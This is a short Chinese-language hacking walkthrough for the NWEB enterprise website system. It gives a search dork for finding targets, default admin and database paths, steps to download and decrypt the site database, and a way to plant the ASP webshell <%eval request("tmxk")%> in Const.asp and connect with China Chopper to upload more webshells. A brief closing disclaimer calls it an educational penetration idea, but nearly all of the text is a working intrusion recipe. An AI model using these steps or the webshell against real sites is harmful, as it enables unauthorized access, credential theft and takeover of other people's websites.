万博企业网站系统(NWEB System)
关键字:inurl:system/adminlogin.asp
后台地址:http://域名/system/adminlogin.asp
数据库地址:http://域名/Database/NwebCn_Site.mdb
‘网站数据:/Database/NwebCn_Site.mdb (常规内容数据库)
‘ /Database/Bak_NwebCn_Site.mdb (备份内容数据库)
‘ /Database/NwebCn_Stat.mdb (常规流量数据库)
‘ /Database/Bak_NwebCn_Stat.mdb (备份流量数据库)
‘常量配置:/Include/Const.asp (如果你更改过数据库存放路径或文件名,漏洞相应常量在此文件作修改)
利用文件:http://域名/Include/Const.asp
利用代码:<%eval request("tmxk")%>
1.打开目标站点。
2.在目标站点后面加上 /Database/NwebCn_Site.mdb 下载站点数据库,也就是:http://域名/Database/NwebCn_Site.mdb。
3.打开数据库解密文。
4.获取明文后登录后台。
5.在左侧菜单选择“系统管理”→“常规设置”
6.重点来了 在哪里? 你们懂得,就是一句话 看到没 我们把双引号里面的c改成tmxk 然后保存。
7.菜刀连接地址出来了。
8.菜刀连接地址:http://域名/Include/Const.asp,我们直接打开是个空白页 ,你们都懂。
9.既然是空白页 那我们就用菜刀连接试试。
10.连接成功,数据还有点多的,网马什么的就不一一截图出来了,经测试,可直接上传小马、大马等。
这个是网站默认的设置漏洞问题,现在大多网站早就没有这个漏洞了,不要再去实验,只是告诉大家一中渗透思路。同时也提醒大家注意这些细节的安全问题。